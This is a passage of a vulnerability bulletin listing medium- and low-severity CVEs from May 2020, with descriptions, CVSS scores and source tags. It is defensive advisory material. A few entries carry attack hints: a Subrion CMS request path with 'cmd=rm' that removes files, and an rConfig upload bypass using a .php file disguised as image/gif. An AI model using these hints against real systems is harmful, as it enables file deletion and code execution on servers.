  A validation issue in HPE Superdome Flex's RMC component may allow local elevation of privilege. Apply HPE Superdome Flex Server version 3.25.46 or later to resolve this issue. 2020-05-19 4.6 CVE-2020-7137
MISC httplib2 -- httplib2
  In httplib2 before version 0.18.0, an attacker controlling an unescaped part of the URI passed to `httplib2.Http.request()` could change request headers and body, and send additional hidden requests to the same server. This vulnerability impacts software that uses httplib2 with a URI constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0. 2020-05-20 4.3 CVE-2020-11078
MISC
CONFIRM
MLIST huawei -- e6878-370_devices
  E6878-370 with versions of 10.0.3.1(H557SP27C233), 10.0.3.1(H563SP1C00), 10.0.3.1(H563SP1C233) has a use after free vulnerability. The software references memory after it has been freed in certain scenarios. If the attacker performs a series of crafted operations through the web portal, a successful exploit could cause a use after free condition, which may lead to malicious code execution. 2020-05-21 5.4 CVE-2020-1799
MISC huawei -- multiple_smartphones
  Huawei smartphones Honor View 20; Honor 20; Honor 20 PRO; Honor Magic2 with versions earlier than 10.0.0.179(C636E3R4P3), versions earlier than 10.0.0.180(C185E3R3P3), versions earlier than 10.0.0.180(C432E10R3P4), versions earlier than 10.0.0.188(C00E62R2P11); versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.176(C00E60R2P11) have an out-of-bounds read vulnerability. The software reads data past the end of the intended buffer. If the attacker tricks the user into installing a crafted application, a successful exploit may cause information disclosure or abnormal service. 2020-05-15 5.8 CVE-2020-1808
MISC ibm -- infosphere_information_server
  IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 176268. 2020-05-19 4.3 CVE-2020-4286
XF
CONFIRM ibm -- security_access_manager_appliance
  IBM Security Access Manager Appliance 9.0.7.1 could allow an authenticated user to bypass security by allowing id_token claims manipulation without verification. IBM X-Force ID: 181481. 2020-05-20 4 CVE-2020-4461
XF
CONFIRM ibm -- spectrum_scale The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service vulnerability in its kernel module that could allow an attacker to cause a denial of service condition on the affected system. To exploit this vulnerability, a local attacker could invoke a subset of ioctls on the Spectrum Scale device with non-valid arguments. This could allow the attacker to crash the kernel. IBM X-Force ID: 179986. 2020-05-19 4.9 CVE-2020-4411
XF
CONFIRM ibm -- spectrum_scale
  The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service security vulnerability. An attacker can force the Spectrum Scale mmfsd/mmsdrserv daemons to unexpectedly exit, impacting the functionality of the Spectrum Scale cluster and the availability of file systems managed by Spectrum Scale. IBM X-Force ID: 179987. 2020-05-19 5 CVE-2020-4412
XF
CONFIRM ifax_solutions -- avantfax_and_hylafax_enterprise_web_interface sendfax.php in iFAX AvantFAX before 3.3.6 and HylaFAX Enterprise Web Interface before 0.2.5 allows authenticated Command Injection. 2020-05-19 6.5 CVE-2020-11766
CONFIRM intel -- cloud_hypervisor
  Kata Containers before 1.11.0 on Cloud Hypervisor persists guest filesystem changes to the underlying image file on the host. A malicious guest can overwrite the image file to gain control of all subsequent guest VMs. Since Kata Containers uses the same VM image file with all VMMs, this issue may also affect QEMU and Firecracker based guests. 2020-05-19 4.6 CVE-2020-2025
CONFIRM intelliants -- subrion_cms
  An XSS issue was identified on the Subrion CMS 4.2.1 /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding. 2020-05-15 4.3 CVE-2019-20389
MISC intelliants -- subrion_cms
  A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion CMS 4.2.1 that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim. 2020-05-15 5.8 CVE-2019-20390
MISC interchange -- interchange
  XSS in the admin help system admin/help.html and admin/quicklinks.html in Interchange 4.7.0 through 5.11.x allows remote attackers to steal credentials or data via browser JavaScript. 2020-05-15 4.3 CVE-2020-12685
MISC
CONFIRM internet_systems_consortium -- bind
  Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results. 2020-05-19 5 CVE-2020-8617
MLIST
CONFIRM
CONFIRM
DEBIAN internet_systems_consortium -- bind
  A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: The performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and The attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor. 2020-05-19 5 CVE-2020-8616
MISC
MLIST
CONFIRM
CONFIRM
DEBIAN jquery -- jquery
  jQuery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e. "</script >", which results in the enclosed script logic being executed. 2020-05-19 4.3 CVE-2020-7656
MISC kde -- amarok
  A remote user can create a specially crafted M3U media playlist file that, when loaded by the target user, will trigger a memory leak, whereby Amarok 2.8.0 continues to waste resources over time, eventually allowing attackers to cause a denial of service. 2020-05-20 4.3 CVE-2020-13152
MISC knot-resolver -- knot-resolver
  Knot Resolver before 5.1.1 allows traffic amplification via a crafted DNS answer from an attacker-controlled server, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records. 2020-05-19 5 CVE-2020-12667
MISC
MLIST
MISC
CONFIRM libexif -- libexif
  An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093. 2020-05-21 6.4 CVE-2020-13112
MISC libexif -- libexif
  An issue was discovered in libexif before 0.6.22. Use of uninitialized memory in EXIF Makernote handling could lead to crashes and potential use-after-free conditions. 2020-05-21 5 CVE-2020-13113
MISC libexif -- libexif
  An issue was discovered in libexif before 0.6.22. An unrestricted size in handling Canon EXIF MakerNote data could lead to consumption of large amounts of compute time for decoding EXIF data. 2020-05-21 4.3 CVE-2020-13114
MISC libreoffice -- libreoffice
  If LibreOffice has an encrypted document open and crashes, that document is auto-saved encrypted. On restart, LibreOffice offers to restore the document and prompts for the password to decrypt it. If the recovery is successful, and if the file format of the recovered document was not LibreOffice's default ODF file format, then affected versions of LibreOffice default to saving the document unencrypted on subsequent saves. This may lead to a user accidentally saving a MSOffice file format document unencrypted while believing it to be encrypted. This issue affects: LibreOffice 6-3 series versions prior to 6.3.6; 6-4 series versions prior to 6.4.3. 2020-05-18 5 CVE-2020-12801
MISC linux -- linux_kernel
  gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the Linux kernel through 5.6.13 relies on kstrdup without considering the possibility of an internal '\0' value, which allows attackers to trigger an out-of-bounds read, aka CID-15753588bcd4. 2020-05-18 4.3 CVE-2020-13143
MISC
MISC linux -- linux_kernel
  The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space. 2020-05-15 4.9 CVE-2020-12888
MLIST
FEDORA
MISC
MISC micro_focus -- service_manager
  A Cross Site Scripting vulnerability exists in the Micro Focus Service Manager product, affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63. The vulnerability could be exploited to allow remote attackers to inject arbitrary web script or HTML. 2020-05-19 4.3 CVE-2020-11845
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1101. 2020-05-21 4.3 CVE-2020-1106
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1184
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1189
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1144
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1190
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190. 2020-05-21 4.6 CVE-2020-1191
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1185
MISC microstar_international -- multiple_msi_gaming_laptops Weak permissions on the "%PROGRAMDATA%\MSI\Dragon Center" folder in Dragon Center before 2.6.2003.2401, shipped with Micro-Star MSI Gaming laptops, allows local authenticated users to overwrite system files and gain escalated privileges. One attack method is to change the Recommended App binary within App.json. Another attack method is to use this part of %PROGRAMDATA% for mounting an RPC Control directory. 2020-05-18 4.6 CVE-2020-13149
MISC misp_project -- misp
  app/View/Events/resolved_attributes.ctp in MISP before 2.4.126 has XSS in the resolved attributes view. 2020-05-18 4.3 CVE-2020-13153
MISC
MISC moodle -- moodle
  A flaw was found in Moodle versions 3.8 before 3.8.3, 3.7 before 3.7.6, 3.6 before 3.6.10, 3.5 before 3.5.12 and earlier unsupported versions. It was possible to create a SCORM package in such a way that when added to a course, it could be interacted with via web services in order to achieve remote code execution. 2020-05-21 6.5 CVE-2020-10738
CONFIRM
CONFIRM
CONFIRM naver -- whale_browser_installer Whale Browser Installer versions before 1.2.0.5 do not support signature verification for the Flash installer. 2020-05-20 6.4 CVE-2020-9753
CONFIRM naviserver -- naviserver
  NaviServer 4.99.4 to 4.99.19 allows denial of service due to the nsd/driver.c ChunkedDecode function not properly validating the length of a chunk. A remote attacker can craft a chunked-transfer request that will result in a negative value being passed to memmove via the size parameter, causing the process to crash. 2020-05-16 5 CVE-2020-13111
MISC
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote write of arbitrary Wi-Fi configuration data such as authentication details (e.g., the Web-admin password), network settings, DNS settings, system administration interface configuration, etc. 2020-05-18 5.8 CVE-2020-11551
MISC
MISC
MISC nitro_software -- nitro_pro An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. In order to trigger this vulnerability, victim must open a malicious file. 2020-05-18 6.8 CVE-2020-6092
MISC nitro_software -- nitro_pro
  An exploitable information disclosure vulnerability exists in the way Nitro Pro 13.9.1.155 does XML error handling. A specially crafted PDF document can cause uninitialized memory access resulting in information disclosure. In order to trigger this vulnerability, victim must open a malicious file. 2020-05-18 4.3 CVE-2020-6093
MISC nitro_software -- nitro_pro
  An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability. 2020-05-18 6.8 CVE-2020-6074
MISC nlnet_labs -- unbound
  Unbound before 1.10.1 has an infinite loop via malformed DNS answers received from upstream servers. 2020-05-19 5 CVE-2020-12663
MLIST
FEDORA
CONFIRM nlnet_labs -- unbound
  Unbound before 1.10.1 has Insufficient Control of Network Message Volume, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records. 2020-05-19 5 CVE-2020-12662
MISC
MLIST
FEDORA
CONFIRM node.js -- node.js
  The kerberos package before 1.0.0 for Node.js allows arbitrary code execution and privilege escalation via injection of malicious DLLs through use of the kerberos_sspi LoadLibrary() method, because of a DLL path search. 2020-05-16 6.9 CVE-2020-13110
MISC
MISC
MISC
MISC open_build_service -- open_build_service
  An Improper Access Control vulnerability in Open Build Service allows remote attackers to read files of an OBS package where the sourceaccess/access is disabled. This issue affects: Open Build Service versions prior to 2.10.5. 2020-05-19 4.3 CVE-2020-8021
CONFIRM paid_memberships_pro -- paid_memberships_pro SQL injection vulnerability in Paid Memberships versions prior to 2.3.3 allows an attacker with administrator rights to execute arbitrary SQL commands via unspecified vectors. 2020-05-20 6.5 CVE-2020-5579
MISC
MISC pcs -- dexicon
  PCS DEXICON 3.4.1 allows XSS via the loginName parameter in login_action.jsp. 2020-05-19 4.3 CVE-2020-6956
MISC php -- php
  In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead the PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by the upload request. This could potentially lead to accumulation of uncleaned temporary files exhausting the disk space on the target server. 2020-05-20 5 CVE-2019-11048
MISC
MISC
FEDORA
FEDORA powerdns -- recursor
  An issue has been found in PowerDNS Recursor 4.1.0 up to and including 4.3.0. It allows an attacker (with enough privileges to change the system's hostname) to cause disclosure of uninitialized memory content via a stack-based out-of-bounds read. It only occurs on systems where gethostname() does not have '\0' termination of the returned string if the hostname is larger than the supplied buffer. (Linux systems are not affected because the buffer is always large enough. OpenBSD systems are not affected because the returned hostname always has '\0' termination.) Under some conditions, this issue can lead to the writing of one '\0' byte out-of-bounds on the stack, causing a denial of service or possibly arbitrary code execution. 2020-05-19 6.5 CVE-2020-10030
SUSE
CONFIRM powerdns -- recursor
  An issue has been found in PowerDNS Recursor 4.1.0 through 4.3.0 where records in the answer section of a NXDOMAIN response lacking an SOA were not properly validated in SyncRes::processAnswer, allowing an attacker to bypass DNSSEC validation. 2020-05-19 5 CVE-2020-12244
SUSE
MLIST
CONFIRM
DEBIAN powerdns -- recursor
  PowerDNS Recursor from 4.1.0 up to and including 4.3.0 does not sufficiently defend against amplification attacks. An issue in the DNS protocol has been found that allows malicious parties to use recursive DNS services to attack third party authoritative name servers. The attack uses a crafted reply by an authoritative name server to amplify the resulting traffic between the recursive and other authoritative name servers. Both types of service can suffer degraded performance as an effect. This is triggered by random subdomains in the NSDNAME in NS records. PowerDNS Recursor 4.1.16, 4.2.2 and 4.3.1 contain a mitigation to limit the impact of this DNS protocol issue. 2020-05-19 5 CVE-2020-10995
SUSE
MISC
CONFIRM python -- python Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py. 2020-05-21 4.3 CVE-2020-13258
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to session fixation because session expiry and randomization are mishandled. The application can reuse a session via PHPSESSID. Also, an attacker can exploit this vulnerability in conjunction with CVE-2020-12256 or CVE-2020-12259. 2020-05-18 6.4 CVE-2020-12258
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to cross-site request forgery (CSRF) because it lacks implementation of CSRF protection such as a CSRF token. An attacker can leverage this vulnerability by creating a form (add a user, delete a user, or edit a user). 2020-05-18 6.8 CVE-2020-12257
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif. 2020-05-18 6.5 CVE-2020-12255
MISC readdle -- documents_app_for_ios
  An issue was discovered in the Readdle Documents app before 6.9.7 for iOS. The application's file-transfer web server allows for cross-origin requests from any domain, and the WebSocket server lacks authorization control. Any web site can execute JavaScript code (that accesses a user's data) via cross-origin requests. 2020-05-18 5 CVE-2019-20801
MISC
MISC readdle -- documents_app_for_ios
  An issue was discovered in the Readdle Documents app before 6.9.7 for iOS. The application's file-transfer web server improperly displays directory names, leading to Stored XSS, which may be used to steal a user's data. This requires user interaction because there is no known direct way for an attacker to create a crafted directory name on a victim's device. However, a crafted directory name can occur if a victim extracts a ZIP archive that was provided by an attacker. 2020-05-18 4.3 CVE-2019-20802
MISC
MISC red_hat -- ansible_engine_and_ansible_tower
  The fix for the flaw CVE-2020-1733 (ansible: insecure temporary directory when running become_user from become directive) was found to be incomplete. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous versions are affected and Ansible Tower 3.4.5, 3.5.6 and 3.6.4 as well as previous versions are affected. 2020-05-15 4.4 CVE-2020-10744
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack. 2020-05-15 4.3 CVE-2020-1758
CONFIRM
MISC red_hat -- jboss_resteasy
  A flaw was found in all resteasy 3.x.x versions prior to 3.12.0.Final and all resteasy 4.x.x versions prior to 4.6.0.Final, where an improper input validation results in returning an illegal header that integrates into the server's response. This flaw may result in an injection, which leads to unexpected behavior when the HTTP response is constructed. 2020-05-19 5 CVE-2020-1695
CONFIRM rockwell_automation -- eds_subsystem Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) are vulnerable. A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object, leading to denial-of-service conditions. 2020-05-19 4.3 CVE-2020-12038
MISC rockwell_automation -- eds_subsystem
  Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) are vulnerable. The EDS subsystem does not provide adequate input sanitation, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This can lead to denial-of-service conditions. 2020-05-20 4.8 CVE-2020-12034
MISC signal -- private_messenger
  Signal Private Messenger Android v4.59.0 and up and iOS v3.8.1.5 and up allows a remote non-contact to ring a victim's Signal phone and disclose the currently used DNS server due to ICE Candidate handling before the call is answered or declined. 2020-05-20 5 CVE-2020-5753
MISC sourcefabric -- newscoop
  Because of Unrestricted Upload of a File with a Dangerous Type, Sourcefabric Newscoop 4.4.7 allows an authenticated user to execute arbitrary PHP code (and sometimes terminal commands) on a server by making an avatar update and then visiting the avatar file under the /images/ path. 2020-05-19 4.6 CVE-2020-11807
MISC
MISC submitty -- submitty Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. 2020-05-16 5.8 CVE-2020-13121
MISC tibco_software -- multiple_products
  The report generator component of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an attacker to exploit HTML injection to gain full control of a web interface containing the output of the report generator component with the privileges of any user that views the affected report(s). The attacker can theoretically exploit this vulnerability when other users view a maliciously generated report, where those reports use Fusion Charts and a data source with contents controlled by the attacker. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Library: versions 7.1.1 and below, versions 7.2.0 and 7.2.1, version 7.3.0, version 7.5.0, TIBCO JasperReports Library for ActiveMatrix BPM: versions 7.1.1 and below, TIBCO JasperReports Server: versions 7.1.1 and below, version 7.2.0, version 7.5.0, TIBCO JasperReports Server for AWS Marketplace: versions 7.5.0 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below. 2020-05-20 6.8 CVE-2020-9410
CONFIRM transmission -- transmission
  Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file. 2020-05-15 6.8 CVE-2018-10756
MISC
MLIST
FEDORA
MISC unisys -- algol_compiler
  Unisys ALGOL Compiler 58.1 before 58.1a.15, 59.1 before 59.1a.9, and 60.0 before 60.0a.5 can emit invalid code sequences under rare circumstances related to syntax. The resulting code could, for example, trigger a system fault or adversely affect confidentiality, integrity, and availability. 2020-05-21 5.9 CVE-2020-12647
CONFIRM videolan -- vlc_media_player
  An off-by-one error in the DecodeBlock function in codec/sdl_image.c in VideoLAN VLC media player before 3.0.9 allows remote attackers to cause a denial of service (memory corruption) via a crafted image file. NOTE: this may be related to the SDL_Image product. 2020-05-15 6.8 CVE-2019-19721
MISC
MISC
MISC
MISC vmware -- cloud_director
  VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access. 2020-05-20 6.5 CVE-2020-3956
MISC wireshark -- wireshark
  In Wireshark 3.2.0 to 3.2.3, 3.0.0 to 3.0.10, and 2.6.0 to 2.6.16, the NFS dissector could crash. This was addressed in epan/dissectors/packet-nfs.c by preventing excessive recursion, such as for a cycle in the directory graph on a filesystem. 2020-05-19 5 CVE-2020-13164
MISC
MISC
MISC wordpress -- wordpress
  An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled. 2020-05-17 6.4 CVE-2020-13125
MISC
MISC wordpress -- wordpress
  An issue was discovered in the Elementor Pro plugin before 2.9.4 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13125. An attacker with the Subscriber role can upload arbitrary executable files to achieve remote code execution. NOTE: the free Elementor plugin is unaffected. 2020-05-17 6.5 CVE-2020-13126
MISC
MISC wowza_media_systems -- wowza_streaming_engine A Reflected XSS was found in the server selection box inside the login page at: enginemanager/loginfailed.html in Wowza Streaming Engine <= 4.x.x. 2020-05-18 4.3 CVE-2019-19456
MISC wowza_media_systems -- wowza_streaming_engine An arbitrary file download was found in the "Download Log" functionality of Wowza Streaming Engine <= 4.x.x 2020-05-18 5 CVE-2019-19454
MISC zoho -- manageengine_service_plus
  Zoho ManageEngine Service Plus before 11.1 build 11112 allows low-privilege authenticated users to discover the File Protection password via a getFileProtectionSettings call to AjaxServlet. 2020-05-18 4 CVE-2020-13154
MISC
MISC

 

Low Vulnerabilities

Primary Vendor -- Product   Description   Published   CVSS Score   Source & Patch Info
d-link -- dsp-w215_devices
  D-Link DSP-W215 1.26b03 devices allow information disclosure by intercepting messages on the local network, as demonstrated by a Squid Proxy. 2020-05-18 3.3 CVE-2020-13135
MISC dolibarr -- dolibarr Dolibarr before 11.0.4 allows XSS. 2020-05-18 3.5 CVE-2020-13094
MISC
MISC
MISC dolibarr -- dolibarr
  The DMS/ECM module in Dolibarr 11.0.4 renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. This causes XSS. 2020-05-20 3.5 CVE-2020-13239
MISC dpdk -- dpdk A vulnerability was found in DPDK versions 18.11 and above. The vhost-crypto library code is missing validations for user-supplied values, potentially allowing an information leak through an out-of-bounds memory read. 2020-05-19 2.1 CVE-2020-10724
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A vulnerability was found in DPDK versions 19.11 and above. A malicious container that has direct access to the vhost-user socket can keep sending VHOST_USER_GET_INFLIGHT_FD messages, causing a resource leak (file descriptors and virtual memory), which may result in a denial of service. 2020-05-20 2.1 CVE-2020-10726
SUSE
MISC
CONFIRM
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5 allows users to upload SVG files via the "Content>File Uploads" screen. These files can contain JavaScript code and thus lead to Stored XSS. 2020-05-18 3.5 CVE-2020-13145
MISC google -- chrome Insufficient policy enforcement in enterprise in Google Chrome prior to 83.0.4103.61 allowed a local attacker to bypass navigation restrictions via UI actions. 2020-05-21 1.9 CVE-2020-6480
MISC
MISC phpipam -- phpipam
  phpIPAM 1.4 contains a stored cross site scripting (XSS) vulnerability within the Edit User Instructions field of the User Instructions widget. 2020-05-20 3.5 CVE-2020-13225
MISC
MISC huawei -- multiple_products
  There is an information leakage vulnerability in some Huawei products. An unauthenticated, adjacent attacker could exploit this vulnerability to decrypt data. Successful exploitation may leak information randomly. Affected product versions include: Anne-AL00 versions earlier than 9.1.0.331(C675E9R1P3T8); Berkeley-L09 versions earlier than 10.0.1.1(C675R1); CD16-10 versions earlier than 10.0.2.8; CD17-10 versions earlier than 10.0.2.8; CD17-16 versions earlier than 10.0.2.8; CD18-10 versions earlier than 10.0.2.8; CD18-16 versions earlier than 10.0.2.8; Columbia-TL00B versions earlier than 9.0.0.187(C01E181R1P20T8); E6878-370 versions earlier than 10.0.5.1(H610SP10C00); Honor 10 Lite versions earlier than 10.0.0.182(C675E17R2P2); LelandP-L22A versions earlier than 9.1.0.166(C675E5R1P4T8); TC5200-16 versions 2020-05-21 3.3 CVE-2020-9069
MISC huawei -- p20_smartphones
  Huawei P20 smartphones with versions earlier than 10.0.0.156(C00E156R1P4) have an improper authentication vulnerability. The vulnerability exists because, when a user wants to perform a certain operation, the software insufficiently validates the user's identity. Attackers need physical access to the smartphone to exploit this vulnerability. A successful exploit could allow the attacker to bypass the limit of the student mode function. 2020-05-15 2.1 CVE-2020-9073
MISC ibm -- i IBM i 7.2, 7.3, and 7.4 users running complex SQL statements under a specific set of circumstances may allow a local user to obtain sensitive information that they should not have access to. IBM X-Force ID: 178318. 2020-05-17 1.9 CVE-2020-4345
XF
CONFIRM ibm -- infosphere_information_server
  IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176475. 2020-05-19 3.5 CVE-2020-4298
XF
CONFIRM kata -- kata_containers
  An improper link resolution vulnerability affects Kata Containers versions prior to 1.11.0. Upon container teardown, a malicious guest can trick the kata-runtime into unmounting any mount point on the host and all mount points underneath it, potentially resulting in a host DoS. 2020-05-19 2.1 CVE-2020-2024
CONFIRM
CONFIRM micro_focus -- enterprise_server_and_enterprise_developer
  Cross Site scripting vulnerability on Micro Focus Enterprise Server and Enterprise developer, affecting all versions prior to version 5.0 Patch Update 8. The vulnerability could allow an attacker to trigger administrative actions when an administrator viewed malicious data left by the attacker (stored XSS) or followed a malicious link (reflected XSS). 2020-05-18 3.5 CVE-2020-9524
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1101, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1100
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1101
MISC

microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_server_2019

